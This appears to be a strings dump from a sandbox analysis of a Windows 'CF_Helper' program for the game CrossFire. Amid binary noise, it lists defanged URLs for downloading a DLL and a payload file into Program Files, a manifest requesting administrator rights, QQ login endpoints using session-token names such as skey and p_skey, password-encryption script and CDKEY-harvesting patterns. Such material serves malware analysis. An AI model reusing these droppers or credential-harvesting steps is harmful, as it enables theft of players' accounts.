MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnrhnrtxjerlszsivxxz|
MA,EE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
NA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[OSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
NA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE\NSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhcZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
l.er;
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyYTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsjvxyz|
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUBMRRWHE[NSWXFWYXZ^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyYTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsivxxz|
8`!%x
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsivxxz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bciJE`ORjYEhYVqNIr\IyZTg^bfaIhdYir_saJwgX|p_fhhkmrnqinrtxjerlszsivxxz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eV]bciJE`ORcOQjYEhYVqNIr\IyZTg^bfaIidYir_saJwgXzq^fhhkmrnqinrtxjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eV]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidYir_saJwgXzr^fhhkmrnqinrtxjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidXir_saJwgXzr^fhhkmrnqinrtyjerlszsivxyz|
MA,FE9KR?WC ZI7WT<fL.bM:iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WT<fL.bM;iP/dQ>qN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhZVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
.pQ\ a
.NaH-*
!)!!))!)-*1-(333:73_
%XE%Z
dj%d~
.PXF3
02/24/16
%UD-Od
lI*wt.KK
%4u3\2t
W.ctn
.yEXjmS
Yn7%X
..RZd
A$#%DR
Wx.xlu
n.mJ~f#
Il%UVl_
.mDB`
.ijWU5
w%SY<s
Wkbn%X
kEYH
&.kPd
(s.PKL
>%fZM
T2%xE
dQ]%U
#.mkTSx
.Ag.~
%f%%f
7".Fv
>.OsM
r.vDO
V2.6.0
\CF_data.ini
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://xinzyw.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://VVV.cfzhushou.com
.text
`.rdata
@.data
CF_Helper.dll
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
\CF_Helper.dll
@.reloc
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
Helper.dll
KERNEL32.dll
InternetCrackUrlA
HttpQueryInfoW
WININET.dll
GetCPInfo
zcÁ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
7.84888<8@8
6 696?6{6
14686<6@6
5 5(50585
? ?$?,?@?`?
>$>0>4>8><>
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
RegOpenKeyExA
RegCreateKeyExA
COMCTL32.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDD:\
01/04/17
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&service=login&nodirect=0&ptsigx=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
p_skey=
skey=
szNick_name=
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
tEXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
<xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
ÿF8>NFFFh
ÿFV
,.Ey)
qTcp,
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&
hXXp://ptlogin2.qq.com/login?u=
&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0®master=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0
hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i  = 16) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512   data.length * chrsz);
return core_md5(opad.concat(hash), 512   128)
for (var i = 0; i < str.length * chrsz; i  = chrsz) {
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i  = chrsz) {
str  = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i  ) {
str  = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8   4)) & 15)   hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i  = 3) {
if (i * 8   j * 6 > binarray.length * 32) {
str  = tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i   2) {
arr.push('\\x'   str.substr(i, 2))
arr = arr.join('');
function getEncryption(password, salt, vcode, isMd5) {
password = password || '';
var md5Pwd = isMd5 ? password: md5(password),
rsaH1 = $.RSA.rsa_encrypt(h1),
rsaH1Len = (rsaH1.length / 2).toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = '000'   vcode.length.toString(16);
while (rsaH1Len.length < 4) {
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len   rsaH1   TEA.strToBytes(salt)   vcodeLen   hexVcode);
TEA.initkey('');
return saltPwd.replace(/[\/\ =]/g,
'/': '-',
' ': '*',
'=': '_'
function getRSAEncryption(password, vcode, isMd5) {
var str1 = isMd5 ? password: md5(password);
var str2 = str1   vcode.toUpperCase();
var str3 = $.RSA.rsa_encrypt(str2);
$.RSA = function() {
while (z   aD < aC.length) {
t  = aC.substring(z, z   aD)   '\n';
return t   aC.substring(z, aC.length)
return '0'   t.toString(16)
return t.toString(16)
if (aG < aD.length   11) {
var aC = aD.length - 1;
var aE = aD.charCodeAt(aC--);
z.nextBytes(t)
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert('Invalid RSA public key')
return t.modPowInt(this.e, this.n)
var t = ah(aC, (this.n.bitLength()   7) >> 3);
var aD = this.doPublic(t);
var z = aD.toString(16);
if ((z.length & 1) == 0) {
N.prototype.doPublic = Y;
N.prototype.setPublic = q;
N.prototype.encrypt = r;
this.fromNumber(z, t, aC)
this.fromString(z, 256)
this.fromString(z, t)
aG = Math.floor(aC / 67108864);
if (ab && (navigator.appName == 'Microsoft Internet Explorer')) {
au.prototype.am = aA;
if (ab && (navigator.appName != 'Netscape')) {
au.prototype.am = b;
au.prototype.am = az;
au.prototype.DB = ay;
au.prototype.DM = ((1 << ay) - 1);
au.prototype.DV = (1 << ay);
au.prototype.FV = Math.pow(2, ac);
au.prototype.F1 = ac - ay;
au.prototype.F2 = 2 * ay - ac;
ar = '0'.charCodeAt(0);
ar = 'a'.charCodeAt(0);
ar = 'A'.charCodeAt(0);
return ag.charAt(t)
var aC = ai[z.charCodeAt(t)];
z.fromInt(t);
this.fromRadix(aG, z);
var aF = aG.length,
if (aG.charAt(aF) == '-') {
if (aE   aD > this.DB) {
this[this.t - 1] |= (t & ((1 << (this.DB - aE)) - 1)) << aE;
this[this.t  ] = (t >> (this.DB - aE))
if (aE >= this.DB) {
aE -= this.DB
this[this.t - 1] |= ((1 << (this.DB - aE)) - 1) << aE
this.clamp();
au.ZERO.subTo(this, this)
var t = this.s & this.DM;
return '-'   this.negate().toString(z)
return this.toRadix(z)
var aG = this.DB - (aD * this.DB) % aC;
if (aG < this.DB && (aH = this[aD] >> aG) > 0) {
aH |= this[--aD] >> (aG  = this.DB - aC)
aG  = this.DB; --aD
au.ZERO.subTo(this, t);
return (this.s < 0) ? this.negate() : this
return this.DB * (this.t - 1)   l(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aC, 0);
var z = aH % this.DB;
var t = this.DB - z;
var aE = Math.floor(aH / this.DB),
aG = (this.s << z) & this.DM,
aD.clamp()
var aE = Math.floor(aG / this.DB);
var z = aG % this.DB;
t = Math.min(z.t, this.t);
aD[aC  ] = aE & this.DM;
aE >>= this.DB
aD[aC  ] = aE & this.DM;
aE >>= this.DB
aD[aC  ] = this.DV   aE
var t = this.abs(),
aE = z.abs();
aD[aC   t.t] = t.am(0, aE[aC], aD, aC, 0, t.t)
aD.clamp();
au.ZERO.subTo(aD, aD)
var t = this.abs();
var aD = t.am(z, t[z], aC, 2 * z, 0, 1);
if ((aC[z   t.t]  = t.am(z   1, 2 * t[z], aC, 2 * z   1, aD, t.t - z - 1)) >= t.DV) {
aC[z   t.t] -= t.DV;
aC[aC.t - 1]  = t.am(z, t[z], aC, 2 * z, 0, 1)
aC.clamp()
var aQ = aK.abs();
var aI = this.abs();
aH.fromInt(0)
this.copyTo(aG)
var aP = this.DB - l(aQ[aQ.t - 1]);
aQ.lShiftTo(aP, aE);
aI.lShiftTo(aP, aG)
aQ.copyTo(aE);
aI.copyTo(aG)
var aT = this.FV / aL,
aE.dlShiftTo(aN, aF);
if (aG.compareTo(aF) >= 0) {
aG.subTo(aF, aG)
au.ONE.dlShiftTo(aM, aF);
aF.subTo(aE, aE);
var aD = (aG[--aO] == aC) ? this.DM: Math.floor(aG[aO] * aT   (aG[aO - 1]   aR) * aS);
if ((aG[aO]  = aE.am(0, aD, aG, aN, 0, aM)) < aD) {
aE.dlShiftTo(aN, aF);
aG.subTo(aF, aG);
aG.subTo(aF, aG)
aG.drShiftTo(aM, aH);
au.ZERO.subTo(aH, aH)
aG.clamp();
aG.rShiftTo(aP, aG)
au.ZERO.subTo(aG, aG)
this.abs().divRemTo(t, null, z);
if (this.s < 0 && z.compareTo(au.ZERO) > 0) {
t.subTo(z, z)
if (t.s < 0 || t.compareTo(this.m) >= 0) {
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.multiplyTo(aC, z);
this.reduce(z)
t.squareTo(z);
M.prototype.convert = X;
M.prototype.revert = am;
M.prototype.reduce = L;
M.prototype.mulTo = J;
M.prototype.sqrTo = aw;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.um = (1 << (t.DB - 15)) - 1;
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
if (t.s < 0 && z.compareTo(au.ZERO) > 0) {
this.m.subTo(z, z)
t.copyTo(z);
this.reduce(z);
while (t.t <= this.mt2) {
var aD = (z * this.mpl   (((z * this.mph   (t[aC] >> 15) * this.mpl) & this.um) << 15)) & t.DM;
t[z]  = this.m.am(0, aD, t, aC, 0, this.m.t);
while (t[z] >= t.DV) {
t[z] -= t.DV;
t.clamp();
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
g.prototype.convert = al;
g.prototype.revert = av;
g.prototype.reduce = R;
g.prototype.mulTo = B;
g.prototype.sqrTo = ao;
return au.ONE
aF = aI.convert(this),
aF.copyTo(aG);
aI.sqrTo(aG, aC);
aI.mulTo(aC, aF, aG)
return aI.revert(aG)
if (aC < 256 || t.isEven()) {
return this.exp(aC, aD)
au.prototype.copyTo = aa;
au.prototype.fromInt = p;
au.prototype.fromString = y;
au.prototype.clamp = Q;
au.prototype.dlShiftTo = at;
au.prototype.drShiftTo = Z;
au.prototype.lShiftTo = v;
au.prototype.rShiftTo = n;
au.prototype.subTo = ad;
au.prototype.multiplyTo = F;
au.prototype.squareTo = S;
au.prototype.divRemTo = G;
au.prototype.invDigit = D;
au.prototype.isEven = k;
au.prototype.exp = A;
au.prototype.toString = s;
au.prototype.negate = T;
au.prototype.abs = an;
au.prototype.compareTo = I;
au.prototype.bitLength = w;
au.prototype.mod = P;
au.prototype.modPowInt = ap;
au.ZERO = c(0);
au.ONE = c(1);
d(new Date().getTime())
if (navigator.appName == 'Netscape' && navigator.appVersion < '5' && window.crypto && window.crypto.random) {
var H = window.crypto.random(32);
for (K = 0; K < H.length;   K) {
W[ae  ] = H.charCodeAt(K) & 255
K = Math.floor(65536 * Math.random());
o.init(W);
for (ae = 0; ae < W.length;   ae) {
return o.next()
for (t = 0; t < z.length;   t) {
af.prototype.nextBytes = ax;
z = (z   this.S[aD]   aE[aD % aE.length]) & 255;
m.prototype.init = f;
m.prototype.next = a;
t.setPublic(aC, z);
return t.encrypt(aD)
return Math.round(Math.random() * 4294967295)
for (var B = 0; B < D.length; B  ) {
var C = Number(D[B]).toString(16);
if (C.length == 1) {
for (var A = 0; A < B.length; A  = 2) {
C  = String.fromCharCode(parseInt(B.substr(A, 2), 16))
for (var A = 0; A < C.length; A  ) {
B[A] = C.charCodeAt(A)
var A = C.length;
var A = E.length;
for (var C = 0; C < B.length; C  ) {
var A = u.length;
for (var B = 0; B < E.length; B  ) {
C[B] = E.charCodeAt(B) & 255
for (var B = 0; B < E.length; B  = 2) {
C[A  ] = parseInt(E.substr(B, 2), 16)
s.TEA = {
for (var B = 0; B < C.length; B  ) {
A  = String.fromCharCode(C[B])
return d.encode(A)
initkey: function(A, B) {
d.PADCHAR = '=';
d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';
d.getbyte = function(C, B) {
var A = C.charCodeAt(B);
d.encode = function(E) {
if (arguments.length != 1) {
var B = d.PADCHAR;
var G = d.ALPHA;
var F = d.getbyte;
var C = E.length - E.length % 3;
if (E.length == 0) {
A.push(G.charAt(H >> 18));
A.push(G.charAt((H >> 12) & 63));
A.push(G.charAt((H >> 6) & 63));
A.push(G.charAt(H & 63))
switch (E.length - C) {
A.push(G.charAt(H >> 18)   G.charAt((H >> 12) & 63)   B   B);
A.push(G.charAt(H >> 18)   G.charAt((H >> 12) & 63)   G.charAt((H >> 6) & 63)   B);
return A.join('')
if (!window.btoa) {
window.btoa = d.encode
var hex = str.toString(16);
var len = hex.length;
arr.push('\\x'   hex.substr(j, 2))
var result = arr.join('');
hexVcode = s.TEA.strToBytes(c.toUpperCase()),
vcodeLen = '000'   c.length.toString(16);
s.TEA.initkey(s2);
var saltPwd = s.TEA.enAsBase64(rsaH1Len   rsaH1   s.TEA.strToBytes(salt)   vcodeLen   hexVcode);
s.TEA.initkey('');
&appid=21000124&js_ver=10181&js_type=1&login_sig=kfVLgNRMRQUC6C0PRRA2ooX-A9w5NXfpsDsDwLOf48L779v*igTIF1BbikF4AjaV&u1=http://cf.qq.com/clan/&r=
hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=
function time(){return Math.random()}
hXXps://ssl.captcha.qq.com/cap_union_getsig_new?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/getimgbysig?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
pt_mbkey
[SKEY]
"cdkey":"(.*?)"
[%d/d/d d:d]
\CF_CDKEY.ini
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
sMsg":"
sMsg":"MODULE OK"
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
hXXp://VVV.baidu.com/
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=


&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5
hXXp://bbs.cf.qq.com/forum.php
&searchkey=15051408311873756101000000000000&from=1&question=免费枪&vip=0&bangdou=1
%7C322%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
